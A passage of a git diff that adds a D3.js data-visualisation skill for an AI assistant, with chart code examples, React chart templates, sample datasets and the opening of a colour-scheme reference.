const rows = Array.from(new Set(data.map(d => d.row)));
|
||||
const columns = Array.from(new Set(data.map(d => d.column)));
|
||||
|
||||
const g = svg.append("g")
|
||||
.attr("transform", `translate(${margin.left},${margin.top})`);
|
||||
|
||||
// Create scales
|
||||
const xScale = d3.scaleBand()
|
||||
.domain(columns)
|
||||
.range([0, innerWidth])
|
||||
.padding(0.01);
|
||||
|
||||
const yScale = d3.scaleBand()
|
||||
.domain(rows)
|
||||
.range([0, innerHeight])
|
||||
.padding(0.01);
|
||||
|
||||
// Colour scale for values
|
||||
const colourScale = d3.scaleSequential(d3.interpolateYlOrRd)
|
||||
.domain([0, d3.max(data, d => d.value)]);
|
||||
|
||||
// Draw rectangles
|
||||
g.selectAll("rect")
|
||||
.data(data)
|
||||
.join("rect")
|
||||
.attr("x", d => xScale(d.column))
|
||||
.attr("y", d => yScale(d.row))
|
||||
.attr("width", xScale.bandwidth())
|
||||
.attr("height", yScale.bandwidth())
|
||||
.attr("fill", d => colourScale(d.value));
|
||||
|
||||
// Add x-axis labels
|
||||
svg.append("g")
|
||||
.attr("transform", `translate(${margin.left},${margin.top})`)
|
||||
.selectAll("text")
|
||||
.data(columns)
|
||||
.join("text")
|
||||
.attr("x", d => xScale(d) + xScale.bandwidth() / 2)
|
||||
.attr("y", -10)
|
||||
.attr("text-anchor", "middle")
|
||||
.text(d => d)
|
||||
.style("font-size", "12px");
|
||||
|
||||
// Add y-axis labels
|
||||
svg.append("g")
|
||||
.attr("transform", `translate(${margin.left},${margin.top})`)
|
||||
.selectAll("text")
|
||||
.data(rows)
|
||||
.join("text")
|
||||
.attr("x", -10)
|
||||
.attr("y", d => yScale(d) + yScale.bandwidth() / 2)
|
||||
.attr("dy", "0.35em")
|
||||
.attr("text-anchor", "end")
|
||||
.text(d => d)
|
||||
.style("font-size", "12px");
|
||||
|
||||
// Add colour legend
|
||||
const legendWidth = 20;
|
||||
const legendHeight = 200;
|
||||
const legend = svg.append("g")
|
||||
.attr("transform", `translate(${width - 60},${margin.top})`);
|
||||
|
||||
const legendScale = d3.scaleLinear()
|
||||
.domain(colourScale.domain())
|
||||
.range([legendHeight, 0]);
|
||||
|
||||
const legendAxis = d3.axisRight(legendScale)
|
||||
.ticks(5);
|
||||
|
||||
// Draw colour gradient in legend
|
||||
for (let i = 0; i < legendHeight; i++) {
|
||||
legend.append("rect")
|
||||
.attr("y", i)
|
||||
.attr("width", legendWidth)
|
||||
.attr("height", 1)
|
||||
.attr("fill", colourScale(legendScale.invert(i)));
|
||||
}
|
||||
|
||||
legend.append("g")
|
||||
.attr("transform", `translate(${legendWidth},0)`)
|
||||
.call(legendAxis);
|
||||
}
|
||||
```
|
||||
|
||||
### Pie chart
|
||||
|
||||
```javascript
|
||||
const pie = d3.pie()
|
||||
.value(d => d.value)
|
||||
.sort(null);
|
||||
|
||||
const arc = d3.arc()
|
||||
.innerRadius(0)
|
||||
.outerRadius(Math.min(width, height) / 2 - 20);
|
||||
|
||||
const colourScale = d3.scaleOrdinal(d3.schemeCategory10);
|
||||
|
||||
const g = svg.append("g")
|
||||
.attr("transform", `translate(${width / 2},${height / 2})`);
|
||||
|
||||
g.selectAll("path")
|
||||
.data(pie(data))
|
||||
.join("path")
|
||||
.attr("d", arc)
|
||||
.attr("fill", (d, i) => colourScale(i))
|
||||
.attr("stroke", "white")
|
||||
.attr("stroke-width", 2);
|
||||
```
|
||||
|
||||
### Force-directed network
|
||||
|
||||
```javascript
|
||||
const simulation = d3.forceSimulation(nodes)
|
||||
.force("link", d3.forceLink(links).id(d => d.id).distance(100))
|
||||
.force("charge", d3.forceManyBody().strength(-300))
|
||||
.force("center", d3.forceCenter(width / 2, height / 2));
|
||||
|
||||
const link = g.selectAll("line")
|
||||
.data(links)
|
||||
.join("line")
|
||||
.attr("stroke", "#999")
|
||||
.attr("stroke-width", 1);
|
||||
|
||||
const node = g.selectAll("circle")
|
||||
.data(nodes)
|
||||
.join("circle")
|
||||
.attr("r", 8)
|
||||
.attr("fill", "steelblue")
|
||||
.call(d3.drag()
|
||||
.on("start", dragstarted)
|
||||
.on("drag", dragged)
|
||||
.on("end", dragended));
|
||||
|
||||
simulation.on("tick", () => {
|
||||
link
|
||||
.attr("x1", d => d.source.x)
|
||||
.attr("y1", d => d.source.y)
|
||||
.attr("x2", d => d.target.x)
|
||||
.attr("y2", d => d.target.y);
|
||||
|
||||
node
|
||||
.attr("cx", d => d.x)
|
||||
.attr("cy", d => d.y);
|
||||
});
|
||||
|
||||
function dragstarted(event) {
|
||||
if (!event.active) simulation.alphaTarget(0.3).restart();
|
||||
event.subject.fx = event.subject.x;
|
||||
event.subject.fy = event.subject.y;
|
||||
}
|
||||
|
||||
function dragged(event) {
|
||||
event.subject.fx = event.x;
|
||||
event.subject.fy = event.y;
|
||||
}
|
||||
|
||||
function dragended(event) {
|
||||
if (!event.active) simulation.alphaTarget(0);
|
||||
event.subject.fx = null;
|
||||
event.subject.fy = null;
|
||||
}
|
||||
```
|
||||
|
||||
## Adding interactivity
|
||||
|
||||
### Tooltips
|
||||
|
||||
```javascript
|
||||
// Create tooltip div (outside SVG)
|
||||
const tooltip = d3.select("body").append("div")
|
||||
.attr("class", "tooltip")
|
||||
.style("position", "absolute")
|
||||
.style("visibility", "hidden")
|
||||
.style("background-color", "white")
|
||||
.style("border", "1px solid #ddd")
|
||||
.style("padding", "10px")
|
||||
.style("border-radius", "4px")
|
||||
.style("pointer-events", "none");
|
||||
|
||||
// Add to elements
|
||||
circles
|
||||
.on("mouseover", function(event, d) {
|
||||
d3.select(this).attr("opacity", 1);
|
||||
tooltip
|
||||
.style("visibility", "visible")
|
||||
.html(`<strong>${d.label}</strong><br/>Value: ${d.value}`);
|
||||
})
|
||||
.on("mousemove", function(event) {
|
||||
tooltip
|
||||
.style("top", (event.pageY - 10) + "px")
|
||||
.style("left", (event.pageX + 10) + "px");
|
||||
})
|
||||
.on("mouseout", function() {
|
||||
d3.select(this).attr("opacity", 0.7);
|
||||
tooltip.style("visibility", "hidden");
|
||||
});
|
||||
```
|
||||
|
||||
### Zoom and pan
|
||||
|
||||
```javascript
|
||||
const zoom = d3.zoom()
|
||||
.scaleExtent([0.5, 10])
|
||||
.on("zoom", (event) => {
|
||||
g.attr("transform", event.transform);
|
||||
});
|
||||
|
||||
svg.call(zoom);
|
||||
```
|
||||
|
||||
### Click interactions
|
||||
|
||||
```javascript
|
||||
circles
|
||||
.on("click", function(event, d) {
|
||||
// Handle click (dispatch event, update app state, etc.)
|
||||
console.log("Clicked:", d);
|
||||
|
||||
// Visual feedback
|
||||
d3.selectAll("circle").attr("fill", "steelblue");
|
||||
d3.select(this).attr("fill", "orange");
|
||||
|
||||
// Optional: dispatch custom event for your framework/app to listen to
|
||||
// window.dispatchEvent(new CustomEvent('chartClick', { detail: d }));
|
||||
});
|
||||
```
|
||||
|
||||
## Transitions and animations
|
||||
|
||||
Add smooth transitions to visual changes:
|
||||
|
||||
```javascript
|
||||
// Basic transition
|
||||
circles
|
||||
.transition()
|
||||
.duration(750)
|
||||
.attr("r", 10);
|
||||
|
||||
// Chained transitions
|
||||
circles
|
||||
.transition()
|
||||
.duration(500)
|
||||
.attr("fill", "orange")
|
||||
.transition()
|
||||
.duration(500)
|
||||
.attr("r", 15);
|
||||
|
||||
// Staggered transitions
|
||||
circles
|
||||
.transition()
|
||||
.delay((d, i) => i * 50)
|
||||
.duration(500)
|
||||
.attr("cy", d => yScale(d.value));
|
||||
|
||||
// Custom easing
|
||||
circles
|
||||
.transition()
|
||||
.duration(1000)
|
||||
.ease(d3.easeBounceOut)
|
||||
.attr("r", 10);
|
||||
```
|
||||
|
||||
## Scales reference
|
||||
|
||||
### Quantitative scales
|
||||
|
||||
```javascript
|
||||
// Linear scale
|
||||
const xScale = d3.scaleLinear()
|
||||
.domain([0, 100])
|
||||
.range([0, 500]);
|
||||
|
||||
// Log scale (for exponential data)
|
||||
const logScale = d3.scaleLog()
|
||||
.domain([1, 1000])
|
||||
.range([0, 500]);
|
||||
|
||||
// Power scale
|
||||
const powScale = d3.scalePow()
|
||||
.exponent(2)
|
||||
.domain([0, 100])
|
||||
.range([0, 500]);
|
||||
|
||||
// Time scale
|
||||
const timeScale = d3.scaleTime()
|
||||
.domain([new Date(2020, 0, 1), new Date(2024, 0, 1)])
|
||||
.range([0, 500]);
|
||||
```
|
||||
|
||||
### Ordinal scales
|
||||
|
||||
```javascript
|
||||
// Band scale (for bar charts)
|
||||
const bandScale = d3.scaleBand()
|
||||
.domain(['A', 'B', 'C', 'D'])
|
||||
.range([0, 400])
|
||||
.padding(0.1);
|
||||
|
||||
// Point scale (for line/scatter categories)
|
||||
const pointScale = d3.scalePoint()
|
||||
.domain(['A', 'B', 'C', 'D'])
|
||||
.range([0, 400]);
|
||||
|
||||
// Ordinal scale (for colours)
|
||||
const colourScale = d3.scaleOrdinal(d3.schemeCategory10);
|
||||
```
|
||||
|
||||
### Sequential scales
|
||||
|
||||
```javascript
|
||||
// Sequential colour scale
|
||||
const colourScale = d3.scaleSequential(d3.interpolateBlues)
|
||||
.domain([0, 100]);
|
||||
|
||||
// Diverging colour scale
|
||||
const divScale = d3.scaleDiverging(d3.interpolateRdBu)
|
||||
.domain([-10, 0, 10]);
|
||||
```
|
||||
|
||||
## Best practices
|
||||
|
||||
### Data preparation
|
||||
|
||||
Always validate and prepare data before visualisation:
|
||||
|
||||
```javascript
|
||||
// Filter invalid values
|
||||
const cleanData = data.filter(d => d.value != null && !isNaN(d.value));
|
||||
|
||||
// Sort data if order matters
|
||||
const sortedData = [...data].sort((a, b) => b.value - a.value);
|
||||
|
||||
// Parse dates
|
||||
const parsedData = data.map(d => ({
|
||||
...d,
|
||||
date: d3.timeParse("%Y-%m-%d")(d.date)
|
||||
}));
|
||||
```
|
||||
|
||||
### Performance optimisation
|
||||
|
||||
For large datasets (>1000 elements):
|
||||
|
||||
```javascript
|
||||
// Use canvas instead of SVG for many elements
|
||||
// Use quadtree for collision detection
|
||||
// Simplify paths with d3.line().curve(d3.curveStep)
|
||||
// Implement virtual scrolling for large lists
|
||||
// Use requestAnimationFrame for custom animations
|
||||
```
|
||||
|
||||
### Accessibility
|
||||
|
||||
Make visualisations accessible:
|
||||
|
||||
```javascript
|
||||
// Add ARIA labels
|
||||
svg.attr("role", "img")
|
||||
.attr("aria-label", "Bar chart showing quarterly revenue");
|
||||
|
||||
// Add title and description
|
||||
svg.append("title").text("Quarterly Revenue 2024");
|
||||
svg.append("desc").text("Bar chart showing revenue growth across four quarters");
|
||||
|
||||
// Ensure sufficient colour contrast
|
||||
// Provide keyboard navigation for interactive elements
|
||||
// Include data table alternative
|
||||
```
|
||||
|
||||
### Styling
|
||||
|
||||
Use consistent, professional styling:
|
||||
|
||||
```javascript
|
||||
// Define colour palettes upfront
|
||||
const colours = {
|
||||
primary: '#4A90E2',
|
||||
secondary: '#7B68EE',
|
||||
background: '#F5F7FA',
|
||||
text: '#333333',
|
||||
gridLines: '#E0E0E0'
|
||||
};
|
||||
|
||||
// Apply consistent typography
|
||||
svg.selectAll("text")
|
||||
.style("font-family", "Inter, sans-serif")
|
||||
.style("font-size", "12px");
|
||||
|
||||
// Use subtle grid lines
|
||||
g.selectAll(".tick line")
|
||||
.attr("stroke", colours.gridLines)
|
||||
.attr("stroke-dasharray", "2,2");
|
||||
```
|
||||
|
||||
## Common issues and solutions
|
||||
|
||||
**Issue**: Axes not appearing
|
||||
- Ensure scales have valid domains (check for NaN values)
|
||||
- Verify axis is appended to correct group
|
||||
- Check transform translations are correct
|
||||
|
||||
**Issue**: Transitions not working
|
||||
- Call `.transition()` before attribute changes
|
||||
- Ensure elements have unique keys for proper data binding
|
||||
- Check that useEffect dependencies include all changing data
|
||||
|
||||
**Issue**: Responsive sizing not working
|
||||
- Use ResizeObserver or window resize listener
|
||||
- Update dimensions in state to trigger re-render
|
||||
- Ensure SVG has width/height attributes or viewBox
|
||||
|
||||
**Issue**: Performance problems
|
||||
- Limit number of DOM elements (consider canvas for >1000 items)
|
||||
- Debounce resize handlers
|
||||
- Use `.join()` instead of separate enter/update/exit selections
|
||||
- Avoid unnecessary re-renders by checking dependencies
|
||||
|
||||
## Resources
|
||||
|
||||
### references/
|
||||
Contains detailed reference materials:
|
||||
- `d3-patterns.md` - Comprehensive collection of visualisation patterns and code examples
|
||||
- `scale-reference.md` - Complete guide to d3 scales with examples
|
||||
- `colour-schemes.md` - D3 colour schemes and palette recommendations
|
||||
|
||||
### assets/
|
||||
|
||||
Contains boilerplate templates:
|
||||
|
||||
- `chart-template.js` - Starter template for basic chart
|
||||
- `interactive-template.js` - Template with tooltips, zoom, and interactions
|
||||
- `sample-data.json` - Example datasets for testing
|
||||
|
||||
These templates work with vanilla JavaScript, React, Vue, Svelte, or any other JavaScript environment. Adapt them as needed for your specific framework.
|
||||
|
||||
To use these resources, read the relevant files when detailed guidance is needed for specific visualisation types or patterns.
|
||||
106
skills/claude-d3js-skill/assets/chart-template.jsx
Normal file
106
skills/claude-d3js-skill/assets/chart-template.jsx
Normal file
@@ -0,0 +1,106 @@
|
||||
import { useEffect, useRef, useState } from 'react';
|
||||
import * as d3 from 'd3';
|
||||
|
||||
function BasicChart({ data }) {
|
||||
const svgRef = useRef();
|
||||
|
||||
useEffect(() => {
|
||||
if (!data || data.length === 0) return;
|
||||
|
||||
// Select SVG element
|
||||
const svg = d3.select(svgRef.current);
|
||||
svg.selectAll("*").remove(); // Clear previous content
|
||||
|
||||
// Define dimensions and margins
|
||||
const width = 800;
|
||||
const height = 400;
|
||||
const margin = { top: 20, right: 30, bottom: 40, left: 50 };
|
||||
const innerWidth = width - margin.left - margin.right;
|
||||
const innerHeight = height - margin.top - margin.bottom;
|
||||
|
||||
// Create main group with margins
|
||||
const g = svg.append("g")
|
||||
.attr("transform", `translate(${margin.left},${margin.top})`);
|
||||
|
||||
// Create scales
|
||||
const xScale = d3.scaleBand()
|
||||
.domain(data.map(d => d.label))
|
||||
.range([0, innerWidth])
|
||||
.padding(0.1);
|
||||
|
||||
const yScale = d3.scaleLinear()
|
||||
.domain([0, d3.max(data, d => d.value)])
|
||||
.range([innerHeight, 0])
|
||||
.nice();
|
||||
|
||||
// Create and append axes
|
||||
const xAxis = d3.axisBottom(xScale);
|
||||
const yAxis = d3.axisLeft(yScale);
|
||||
|
||||
g.append("g")
|
||||
.attr("class", "x-axis")
|
||||
.attr("transform", `translate(0,${innerHeight})`)
|
||||
.call(xAxis);
|
||||
|
||||
g.append("g")
|
||||
.attr("class", "y-axis")
|
||||
.call(yAxis);
|
||||
|
||||
// Bind data and create visual elements (bars in this example)
|
||||
g.selectAll("rect")
|
||||
.data(data)
|
||||
.join("rect")
|
||||
.attr("x", d => xScale(d.label))
|
||||
.attr("y", d => yScale(d.value))
|
||||
.attr("width", xScale.bandwidth())
|
||||
.attr("height", d => innerHeight - yScale(d.value))
|
||||
.attr("fill", "steelblue");
|
||||
|
||||
// Optional: Add axis labels
|
||||
g.append("text")
|
||||
.attr("class", "axis-label")
|
||||
.attr("x", innerWidth / 2)
|
||||
.attr("y", innerHeight + margin.bottom - 5)
|
||||
.attr("text-anchor", "middle")
|
||||
.text("Category");
|
||||
|
||||
g.append("text")
|
||||
.attr("class", "axis-label")
|
||||
.attr("transform", "rotate(-90)")
|
||||
.attr("x", -innerHeight / 2)
|
||||
.attr("y", -margin.left + 15)
|
||||
.attr("text-anchor", "middle")
|
||||
.text("Value");
|
||||
|
||||
}, [data]);
|
||||
|
||||
return (
|
||||
<div className="chart-container">
|
||||
<svg
|
||||
ref={svgRef}
|
||||
width="800"
|
||||
height="400"
|
||||
style={{ border: '1px solid #ddd' }}
|
||||
/>
|
||||
</div>
|
||||
);
|
||||
}
|
||||
|
||||
// Example usage
|
||||
export default function App() {
|
||||
const sampleData = [
|
||||
{ label: 'A', value: 30 },
|
||||
{ label: 'B', value: 80 },
|
||||
{ label: 'C', value: 45 },
|
||||
{ label: 'D', value: 60 },
|
||||
{ label: 'E', value: 20 },
|
||||
{ label: 'F', value: 90 }
|
||||
];
|
||||
|
||||
return (
|
||||
<div className="p-8">
|
||||
<h1 className="text-2xl font-bold mb-4">Basic D3.js Chart</h1>
|
||||
<BasicChart data={sampleData} />
|
||||
</div>
|
||||
);
|
||||
}
|
||||
227
skills/claude-d3js-skill/assets/interactive-template.jsx
Normal file
227
skills/claude-d3js-skill/assets/interactive-template.jsx
Normal file
@@ -0,0 +1,227 @@
|
||||
import { useEffect, useRef, useState } from 'react';
|
||||
import * as d3 from 'd3';
|
||||
|
||||
function InteractiveChart({ data }) {
|
||||
const svgRef = useRef();
|
||||
const tooltipRef = useRef();
|
||||
const [selectedPoint, setSelectedPoint] = useState(null);
|
||||
|
||||
useEffect(() => {
|
||||
if (!data || data.length === 0) return;
|
||||
|
||||
const svg = d3.select(svgRef.current);
|
||||
svg.selectAll("*").remove();
|
||||
|
||||
// Dimensions
|
||||
const width = 800;
|
||||
const height = 500;
|
||||
const margin = { top: 20, right: 30, bottom: 40, left: 50 };
|
||||
const innerWidth = width - margin.left - margin.right;
|
||||
const innerHeight = height - margin.top - margin.bottom;
|
||||
|
||||
// Create main group
|
||||
const g = svg.append("g")
|
||||
.attr("transform", `translate(${margin.left},${margin.top})`);
|
||||
|
||||
// Scales
|
||||
const xScale = d3.scaleLinear()
|
||||
.domain([0, d3.max(data, d => d.x)])
|
||||
.range([0, innerWidth])
|
||||
.nice();
|
||||
|
||||
const yScale = d3.scaleLinear()
|
||||
.domain([0, d3.max(data, d => d.y)])
|
||||
.range([innerHeight, 0])
|
||||
.nice();
|
||||
|
||||
const sizeScale = d3.scaleSqrt()
|
||||
.domain([0, d3.max(data, d => d.size || 10)])
|
||||
.range([3, 20]);
|
||||
|
||||
const colourScale = d3.scaleOrdinal(d3.schemeCategory10);
|
||||
|
||||
// Add zoom behaviour
|
||||
const zoom = d3.zoom()
|
||||
.scaleExtent([0.5, 10])
|
||||
.on("zoom", (event) => {
|
||||
g.attr("transform", `translate(${margin.left + event.transform.x},${margin.top + event.transform.y}) scale(${event.transform.k})`);
|
||||
});
|
||||
|
||||
svg.call(zoom);
|
||||
|
||||
// Axes
|
||||
const xAxis = d3.axisBottom(xScale);
|
||||
const yAxis = d3.axisLeft(yScale);
|
||||
|
||||
const xAxisGroup = g.append("g")
|
||||
.attr("class", "x-axis")
|
||||
.attr("transform", `translate(0,${innerHeight})`)
|
||||
.call(xAxis);
|
||||
|
||||
const yAxisGroup = g.append("g")
|
||||
.attr("class", "y-axis")
|
||||
.call(yAxis);
|
||||
|
||||
// Grid lines
|
||||
g.append("g")
|
||||
.attr("class", "grid")
|
||||
.attr("opacity", 0.1)
|
||||
.call(d3.axisLeft(yScale)
|
||||
.tickSize(-innerWidth)
|
||||
.tickFormat(""));
|
||||
|
||||
g.append("g")
|
||||
.attr("class", "grid")
|
||||
.attr("opacity", 0.1)
|
||||
.attr("transform", `translate(0,${innerHeight})`)
|
||||
.call(d3.axisBottom(xScale)
|
||||
.tickSize(-innerHeight)
|
||||
.tickFormat(""));
|
||||
|
||||
// Tooltip
|
||||
const tooltip = d3.select(tooltipRef.current);
|
||||
|
||||
// Data points
|
||||
const circles = g.selectAll("circle")
|
||||
.data(data)
|
||||
.join("circle")
|
||||
.attr("cx", d => xScale(d.x))
|
||||
.attr("cy", d => yScale(d.y))
|
||||
.attr("r", d => sizeScale(d.size || 10))
|
||||
.attr("fill", d => colourScale(d.category || 'default'))
|
||||
.attr("stroke", "#fff")
|
||||
.attr("stroke-width", 2)
|
||||
.attr("opacity", 0.7)
|
||||
.style("cursor", "pointer");
|
||||
|
||||
// Hover interactions
|
||||
circles
|
||||
.on("mouseover", function(event, d) {
|
||||
// Enlarge circle
|
||||
d3.select(this)
|
||||
.transition()
|
||||
.duration(200)
|
||||
.attr("opacity", 1)
|
||||
.attr("stroke-width", 3);
|
||||
|
||||
// Show tooltip
|
||||
tooltip
|
||||
.style("display", "block")
|
||||
.style("left", (event.pageX + 10) + "px")
|
||||
.style("top", (event.pageY - 10) + "px")
|
||||
.html(`
|
||||
<strong>${d.label || 'Point'}</strong><br/>
|
||||
X: ${d.x.toFixed(2)}<br/>
|
||||
Y: ${d.y.toFixed(2)}<br/>
|
||||
${d.category ? `Category: ${d.category}<br/>` : ''}
|
||||
${d.size ? `Size: ${d.size.toFixed(2)}` : ''}
|
||||
`);
|
||||
})
|
||||
.on("mousemove", function(event) {
|
||||
tooltip
|
||||
.style("left", (event.pageX + 10) + "px")
|
||||
.style("top", (event.pageY - 10) + "px");
|
||||
})
|
||||
.on("mouseout", function() {
|
||||
// Restore circle
|
||||
d3.select(this)
|
||||
.transition()
|
||||
.duration(200)
|
||||
.attr("opacity", 0.7)
|
||||
.attr("stroke-width", 2);
|
||||
|
||||
// Hide tooltip
|
||||
tooltip.style("display", "none");
|
||||
})
|
||||
.on("click", function(event, d) {
|
||||
// Highlight selected point
|
||||
circles.attr("stroke", "#fff").attr("stroke-width", 2);
|
||||
d3.select(this)
|
||||
.attr("stroke", "#000")
|
||||
.attr("stroke-width", 3);
|
||||
|
||||
setSelectedPoint(d);
|
||||
});
|
||||
|
||||
// Add transition on initial render
|
||||
circles
|
||||
.attr("r", 0)
|
||||
.transition()
|
||||
.duration(800)
|
||||
.delay((d, i) => i * 20)
|
||||
.attr("r", d => sizeScale(d.size || 10));
|
||||
|
||||
// Axis labels
|
||||
g.append("text")
|
||||
.attr("class", "axis-label")
|
||||
.attr("x", innerWidth / 2)
|
||||
.attr("y", innerHeight + margin.bottom - 5)
|
||||
.attr("text-anchor", "middle")
|
||||
.style("font-size", "14px")
|
||||
.text("X Axis");
|
||||
|
||||
g.append("text")
|
||||
.attr("class", "axis-label")
|
||||
.attr("transform", "rotate(-90)")
|
||||
.attr("x", -innerHeight / 2)
|
||||
.attr("y", -margin.left + 15)
|
||||
.attr("text-anchor", "middle")
|
||||
.style("font-size", "14px")
|
||||
.text("Y Axis");
|
||||
|
||||
}, [data]);
|
||||
|
||||
return (
|
||||
<div className="relative">
|
||||
<svg
|
||||
ref={svgRef}
|
||||
width="800"
|
||||
height="500"
|
||||
style={{ border: '1px solid #ddd', cursor: 'grab' }}
|
||||
/>
|
||||
<div
|
||||
ref={tooltipRef}
|
||||
style={{
|
||||
position: 'absolute',
|
||||
display: 'none',
|
||||
padding: '10px',
|
||||
background: 'white',
|
||||
border: '1px solid #ddd',
|
||||
borderRadius: '4px',
|
||||
pointerEvents: 'none',
|
||||
boxShadow: '0 2px 4px rgba(0,0,0,0.1)',
|
||||
fontSize: '13px',
|
||||
zIndex: 1000
|
||||
}}
|
||||
/>
|
||||
{selectedPoint && (
|
||||
<div className="mt-4 p-4 bg-blue-50 rounded border border-blue-200">
|
||||
<h3 className="font-bold mb-2">Selected Point</h3>
|
||||
<pre className="text-sm">{JSON.stringify(selectedPoint, null, 2)}</pre>
|
||||
</div>
|
||||
)}
|
||||
</div>
|
||||
);
|
||||
}
|
||||
|
||||
// Example usage
|
||||
export default function App() {
|
||||
const sampleData = Array.from({ length: 50 }, (_, i) => ({
|
||||
id: i,
|
||||
label: `Point ${i + 1}`,
|
||||
x: Math.random() * 100,
|
||||
y: Math.random() * 100,
|
||||
size: Math.random() * 30 + 5,
|
||||
category: ['A', 'B', 'C', 'D'][Math.floor(Math.random() * 4)]
|
||||
}));
|
||||
|
||||
return (
|
||||
<div className="p-8">
|
||||
<h1 className="text-2xl font-bold mb-2">Interactive D3.js Chart</h1>
|
||||
<p className="text-gray-600 mb-4">
|
||||
Hover over points for details. Click to select. Scroll to zoom. Drag to pan.
|
||||
</p>
|
||||
<InteractiveChart data={sampleData} />
|
||||
</div>
|
||||
);
|
||||
}
|
||||
115
skills/claude-d3js-skill/assets/sample-data.json
Normal file
115
skills/claude-d3js-skill/assets/sample-data.json
Normal file
@@ -0,0 +1,115 @@
|
||||
{
|
||||
"timeSeries": [
|
||||
{ "date": "2024-01-01", "value": 120, "category": "A" },
|
||||
{ "date": "2024-02-01", "value": 135, "category": "A" },
|
||||
{ "date": "2024-03-01", "value": 128, "category": "A" },
|
||||
{ "date": "2024-04-01", "value": 145, "category": "A" },
|
||||
{ "date": "2024-05-01", "value": 152, "category": "A" },
|
||||
{ "date": "2024-06-01", "value": 168, "category": "A" },
|
||||
{ "date": "2024-07-01", "value": 175, "category": "A" },
|
||||
{ "date": "2024-08-01", "value": 182, "category": "A" },
|
||||
{ "date": "2024-09-01", "value": 190, "category": "A" },
|
||||
{ "date": "2024-10-01", "value": 185, "category": "A" },
|
||||
{ "date": "2024-11-01", "value": 195, "category": "A" },
|
||||
{ "date": "2024-12-01", "value": 210, "category": "A" }
|
||||
],
|
||||
|
||||
"categorical": [
|
||||
{ "label": "Product A", "value": 450, "category": "Electronics" },
|
||||
{ "label": "Product B", "value": 320, "category": "Electronics" },
|
||||
{ "label": "Product C", "value": 580, "category": "Clothing" },
|
||||
{ "label": "Product D", "value": 290, "category": "Clothing" },
|
||||
{ "label": "Product E", "value": 410, "category": "Food" },
|
||||
{ "label": "Product F", "value": 370, "category": "Food" }
|
||||
],
|
||||
|
||||
"scatterData": [
|
||||
{ "x": 12, "y": 45, "size": 25, "category": "Group A", "label": "Point 1" },
|
||||
{ "x": 25, "y": 62, "size": 35, "category": "Group A", "label": "Point 2" },
|
||||
{ "x": 38, "y": 55, "size": 20, "category": "Group B", "label": "Point 3" },
|
||||
{ "x": 45, "y": 78, "size": 40, "category": "Group B", "label": "Point 4" },
|
||||
{ "x": 52, "y": 68, "size": 30, "category": "Group C", "label": "Point 5" },
|
||||
{ "x": 65, "y": 85, "size": 45, "category": "Group C", "label": "Point 6" },
|
||||
{ "x": 72, "y": 72, "size": 28, "category": "Group A", "label": "Point 7" },
|
||||
{ "x": 85, "y": 92, "size": 50, "category": "Group B", "label": "Point 8" }
|
||||
],
|
||||
|
||||
"hierarchical": {
|
||||
"name": "Root",
|
||||
"children": [
|
||||
{
|
||||
"name": "Category 1",
|
||||
"children": [
|
||||
{ "name": "Item 1.1", "value": 100 },
|
||||
{ "name": "Item 1.2", "value": 150 },
|
||||
{ "name": "Item 1.3", "value": 80 }
|
||||
]
|
||||
},
|
||||
{
|
||||
"name": "Category 2",
|
||||
"children": [
|
||||
{ "name": "Item 2.1", "value": 200 },
|
||||
{ "name": "Item 2.2", "value": 120 },
|
||||
{ "name": "Item 2.3", "value": 90 }
|
||||
]
|
||||
},
|
||||
{
|
||||
"name": "Category 3",
|
||||
"children": [
|
||||
{ "name": "Item 3.1", "value": 180 },
|
||||
{ "name": "Item 3.2", "value": 140 }
|
||||
]
|
||||
}
|
||||
]
|
||||
},
|
||||
|
||||
"network": {
|
||||
"nodes": [
|
||||
{ "id": "A", "group": 1 },
|
||||
{ "id": "B", "group": 1 },
|
||||
{ "id": "C", "group": 1 },
|
||||
{ "id": "D", "group": 2 },
|
||||
{ "id": "E", "group": 2 },
|
||||
{ "id": "F", "group": 3 },
|
||||
{ "id": "G", "group": 3 },
|
||||
{ "id": "H", "group": 3 }
|
||||
],
|
||||
"links": [
|
||||
{ "source": "A", "target": "B", "value": 1 },
|
||||
{ "source": "A", "target": "C", "value": 2 },
|
||||
{ "source": "B", "target": "C", "value": 1 },
|
||||
{ "source": "C", "target": "D", "value": 3 },
|
||||
{ "source": "D", "target": "E", "value": 2 },
|
||||
{ "source": "E", "target": "F", "value": 1 },
|
||||
{ "source": "F", "target": "G", "value": 2 },
|
||||
{ "source": "F", "target": "H", "value": 1 },
|
||||
{ "source": "G", "target": "H", "value": 1 }
|
||||
]
|
||||
},
|
||||
|
||||
"stackedData": [
|
||||
{ "group": "Q1", "seriesA": 30, "seriesB": 40, "seriesC": 25 },
|
||||
{ "group": "Q2", "seriesA": 45, "seriesB": 35, "seriesC": 30 },
|
||||
{ "group": "Q3", "seriesA": 40, "seriesB": 50, "seriesC": 35 },
|
||||
{ "group": "Q4", "seriesA": 55, "seriesB": 45, "seriesC": 40 }
|
||||
],
|
||||
|
||||
"geographicPoints": [
|
||||
{ "city": "London", "latitude": 51.5074, "longitude": -0.1278, "value": 8900000 },
|
||||
{ "city": "Paris", "latitude": 48.8566, "longitude": 2.3522, "value": 2140000 },
|
||||
{ "city": "Berlin", "latitude": 52.5200, "longitude": 13.4050, "value": 3645000 },
|
||||
{ "city": "Madrid", "latitude": 40.4168, "longitude": -3.7038, "value": 3223000 },
|
||||
{ "city": "Rome", "latitude": 41.9028, "longitude": 12.4964, "value": 2873000 }
|
||||
],
|
||||
|
||||
"divergingData": [
|
||||
{ "category": "Item A", "value": -15 },
|
||||
{ "category": "Item B", "value": 8 },
|
||||
{ "category": "Item C", "value": -22 },
|
||||
{ "category": "Item D", "value": 18 },
|
||||
{ "category": "Item E", "value": -5 },
|
||||
{ "category": "Item F", "value": 25 },
|
||||
{ "category": "Item G", "value": -12 },
|
||||
{ "category": "Item H", "value": 14 }
|
||||
]
|
||||
}
|
||||
564
skills/claude-d3js-skill/references/colour-schemes.md
Normal file
564
skills/claude-d3js-skill/references/colour-schemes.md
Normal file
@@ -0,0 +1,564 @@
|
||||
# D3.js Colour Schemes and Palette Recommendations
|
||||
|
||||
Comprehensive guide to colour selection in data visualisation with d3.js.
|
||||
|
||||
## Built-in categorical colour schemes
|
||||
|
||||
### Category10 (default)
|
||||
|
||||
```javascript
|
||||
d3.schemeCategory10
|
||||
// ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd',
|
||||
// '#8c564b', '#e377c2', '#7f7f7f', '#bcbd22', '#17becf']
|
||||
```
|
||||
|
||||
**Characteristics:**
|
||||
- 10 distinct colours
|
||||
- Good colour-blind accessibility
|
||||
- Default choice for most categorical data
|
||||
